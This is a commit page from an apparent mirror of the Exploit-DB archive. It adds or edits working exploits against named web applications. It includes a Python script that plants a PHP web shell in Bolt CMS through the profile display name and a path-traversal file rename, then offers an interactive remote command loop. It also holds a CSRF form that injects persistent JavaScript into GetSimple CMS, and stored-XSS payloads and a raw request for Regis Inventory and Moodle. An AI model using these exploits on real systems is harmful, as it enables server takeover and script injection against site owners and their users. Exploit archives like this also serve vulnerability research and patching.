bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-03-27

Browse source 
4 changes to exploits/shellcodes

GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS
Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
This commit is contained in:
Offensive Security 2021-03-27 05:01:53 +00:00
parent 06a83531de
commit 95de3ffa84
5 changed files with 159 additions and 86 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

149
exploits/php/webapps/48296.py
View file

@ -7,11 +7,6 @@
# Tested on: Linux # Tested on: Linux
# CVE : not-yet-0day # CVE : not-yet-0day
# last version
# p0c
#!/usr/bin/python #!/usr/bin/python
import requests import requests
@ -20,37 +15,26 @@ import warnings
import re import re
import os import os
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from colorama import init from colorama import init
from termcolor import colored from termcolor import colored
init() init()
#pip install -r requirements.txt
print(colored(''' print(colored('''
Pre Auth rce with low credintanl Pre Auth rce with low credintanl
By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
@ -65,8 +49,7 @@ password = sys.argv[3]
request = requests.session() request = requests.session()
print((colored("[+] Retrieving CSRF token to submit the login print((colored("[+] Retrieving CSRF token to submit the login form","green")))
form","green")))
page = request.get(url+"/bolt/login") page = request.get(url+"/bolt/login")
html_content = page.text html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser') soup = BeautifulSoup(html_content, 'html.parser')
@ -87,15 +70,15 @@ print((colored("[+] Login token is : {0}","green")).format(token))
aaa = request.get(url+"/bolt/profile") aaa = request.get(url+"/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser') soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value") token0 = soup0.findAll('input')[6].get("value")
data_profile = { data_profile = {
"user_profile[password][first]":"password", "user_profile[password][first]":"password",
"user_profile[password][second]":"password", "user_profile[password][second]":"password",
"user_profile[email]":"a@a.com", "user_profile[email]":"a@a.com",
"user_profile[displayname]":"<?php system($_GET['test']);?>", "user_profile[displayname]":"<?php system($_GET['test']);?>",
"user_profile[save]":"", "user_profile[save]":"",
"user_profile[_token]":token0 "user_profile[_token]":token0
} }
profile = request.post(url+'/bolt/profile',data_profile) profile = request.post(url+'/bolt/profile',data_profile)
@ -113,55 +96,49 @@ tables = soup2.find_all('span', class_ = 'entry disabled')
print((colored("[+] SESSION INJECTION ","green"))) print((colored("[+] SESSION INJECTION ","green")))
for all_tables in tables: for all_tables in tables:
f= open("session.txt","a+") f= open("session.txt","a+")
f.write(all_tables.text+"\n") f.write(all_tables.text+"\n")
f.close() f.close()
num_lines = sum(1 for line in open('session.txt')) num_lines = sum(1 for line in open('session.txt'))
renamePostData = { renamePostData = {
"namespace": "root", "namespace": "root",
"parent": "/app/cache/.sessions", "parent": "/app/cache/.sessions",
"oldname": all_tables.text, "oldname": all_tables.text,
"newname": "../../../public/files/test{}.php".format(num_lines), "newname": "../../../public/files/test{}.php".format(num_lines),
"token": csrf "token": csrf
} }
rename = request.post(url+"/async/folder/rename", renamePostData) rename = request.post(url+"/async/folder/rename", renamePostData)
try:
url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
try: rev = requests.get(url1).text
url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) r1 = re.findall('php',rev)
rev = requests.get(url1).text r2 = r1[0]
r1 = re.findall('php',rev) if r2 == "php" :
fileINJ = "test{}".format(num_lines)
r2 = r1[0]
if r2 == "php" : print((colored("[+] FOUND : "+fileINJ,"green")))
fileINJ = "test{}".format(num_lines)
except IndexError:
print((colored("[+] FOUND : "+fileINJ,"green"))) print((colored("[-] Not found.","red")))
except IndexError:
print((colored("[-] Not found.","red")))
new_name = 0 new_name = 0
while new_name != 'quit': while new_name != 'quit':
inputs = input(colored("Enter OS command , for exit 'quit' : inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red"))
","green","on_red")) if inputs == "quit" :
if inputs == "quit" : exit()
exit() else:
else: a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) aa = a.text
aa = a.text r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
print((r11)[0]) print((r11)[0])
Greetz to : all my friends

21
exploits/php/webapps/49712.html Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
# Exploit Author: Abhishek Joshi
# Date: March 25, 2021
# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download
# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip
# Version: 0.1
# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10
# Tested against: Firefox 78.7.0esr (64-bit)
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site.
## CSRF POST Form Method
<html><body>
<form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST">
<input type="hidden" name="customjs_url_content" value="">
<input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')">
<input type="hidden" name="submit" value="Save Settings">
<input type="submit" value="Submit request">
</form>
</body></html>

22
exploits/php/webapps/49713.txt Normal file
View file

@ -0,0 +1,22 @@
# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS
# Exploit Author: George Tsimpidas
# Date: 2021-03-25
# Vendor Homepage: www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip
# Version : 1.0.0
# Tested on: Kali Linux 2020.4
# Category: Webapp
# Description
Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category
#PoC
1. Login as admin : http://localhost/regis_inventory/index.php
2. Visit : http://localhost/regis_inventory/item.php
3. Click add a New Item and input your payload on "Generic Name" textbox.
Payload : <script>alert("XSS")</script>
4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up

50
exploits/php/webapps/49714.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
# Date: 25.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://moodle.org/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month
Choose a role : Student (example)
Open calendar :
https://school.localhost/calendar/view.php?view=month
Create new event:
Example:
Event Title "Test"
Description :Choose Insert Video File and choose Video:
Video Source Url you can paste video link from youtube
And open Subtitles and Captions:
Subtitle track URL use video link from youtube
Field Label : There is we can use xss code:
<img src="1" onerror="alert(1)" />
or try in base64
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+"
type="image/svg+xml" AllowScriptAccess="always"></embed>
Insert Media and save this.
Open event and get stored xss.
POST:
https://school.localhost/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form
Host: school.localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 996
Origin: https://school.localhost
Connection: keep-alive
Referer: https://school.localhost/calendar/view.php?view=month
Cookie: MoodleSession=4ea0036558425526decc096ed375b886;
EU_COOKIE_LAW_CONSENT=true
[{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test&timestart%5Bday%5D=25&timestart%5Bmonth%5D=3&timestart%5Byear%5D=2021&timestart%5Bhour%5D=10&timestart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}]

3
files_exploits.csv
View file

@ -43892,4 +43892,7 @@ id,file,description,date,author,type,platform,port
49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware, 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,
49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php, 49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php,
49712,exploits/php/webapps/49712.html,"GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS",2021-03-26,"Abhishek Joshi",webapps,php,
49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS",2021-03-26,"George Tsimpidas",webapps,php,
49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php, 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,

Can't render this file because it is too large.